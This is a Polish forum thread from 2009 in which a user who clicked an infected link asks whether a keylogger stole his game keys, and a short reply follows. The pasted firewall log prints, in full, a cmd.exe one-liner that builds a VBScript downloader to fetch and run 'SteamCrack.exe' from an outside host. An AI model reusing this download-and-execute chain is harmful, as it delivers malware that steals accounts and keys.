Java Log

[reaktiv]

Witam. Przegladajac pewne forum, kliknalem link w temacie, ktory zrobil znajomy. Okazalo sie, ze jego konto zostalo przejete i link mial ukryte przeznaczenie - przejecie kont steam/cd-keya(keylogger).

 

Otoz sprawdzalem logi z firewalla i natrafilem na kod z javy(strona byla w javie). Po tym jak kliknalem link i sie dowiedzialem ze jest zainfekowany, wyczyscilem rejestr, temp itp., zrobilem scan NOD32, Ad-Aware, Dr.Med, S&D, sprawdzilem logi HiJacka i nic juz nie znalazlem.

 

Moje pytanie jest, czy log, ktory zamiescilem ponizej, byl przeznaczony tylko i wylacznie do wykradniecia danych konta STEAM(nie posiadam zadnego), czy tez mogl wykrasc np. key z innych gier, np. COD4. Jesli tak, to czy dokonal swego dziela?

 

» Naciśnij aby pokazać/ukryć tekst oznaczony jako spoiler « - "Log"

2009/12/25 23:47:38   [firefox.exe:3644] start process 00004B73/1588 "C:\PROGRAM FILES\JAVA\JRE6\BIN\JAVA.EXE"2009/12/25 23:47:38   process info 00004B73/1588 <- 0000477C/3644 [C:\PROGRAM FILES\JAVA\JRE6\BIN\JAVA.EXE] ""C:\Program Files\Java\jre6\bin\java.exe" -D__jvm_launched=32394280739 -Xbootclasspath/a:C:\PROGRA~1\Java\jre6\lib\deploy.jar;C:\PROGRA~1\Java\jre6\lib\javaws.jar;C:\PROGRA~1\Java\jre6\lib\plugin.jar -Djava.class.path=C:\PROGRA~1\Java\jre6\classes sun.plugin2.main.client.PluginMain write_pipe_name=jpi2_pid3644_pipe2,read_pipe_name=jpi2_pid3644_pipe1"2009/12/25 23:47:43   [java.exe:1588] start process 00004B90/1208 "C:\WINDOWS\SYSTEM32\CMD.EXE"2009/12/25 23:47:43   process info 00004B90/1208 <- 00004B73/1588 [C:\WINDOWS\SYSTEM32\CMD.EXE] "cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs hxxp://h1[dot]ripway[dot]com/benjie4444/SteamCrack.exe %temp%\update.exe"2009/12/25 23:47:43   [cmd.exe:1208] start process 00004B93/1616 "C:\WINDOWS\SYSTEM32\WSCRIPT.EXE"2009/12/25 23:47:43   process info 00004B93/1616 <- 00004B90/1208 [C:\WINDOWS\SYSTEM32\WSCRIPT.EXE] ""C:\WINDOWS\System32\WScript.exe" "C:\DOCUME~1\rkv\LOCALS~1\Temp\winconfig.vbs"  hxxp://h1[dot]ripway[dot]com/benjie4444/SteamCrack.exe C:\DOCUME~1\rkv\LOCALS~1\Temp\update.exe"2009/12/25 23:47:43   [cmd.exe:1208] process terminated 00004B90/1208

W logu znajduje sie URL, ktory zapewne sluzy do przechowywania skradzionych danych, nie wiem czy to bylo konieczne, ale wyedytowalem go troche na wszelki wypadek.

Edytowane 26 Grudnia 2009 przez reaktiv

[Kolobos]

Ten skrypt sciagnali i uruchomil jakies pliki, a co sie dalej dzialo tego nie wiadomo.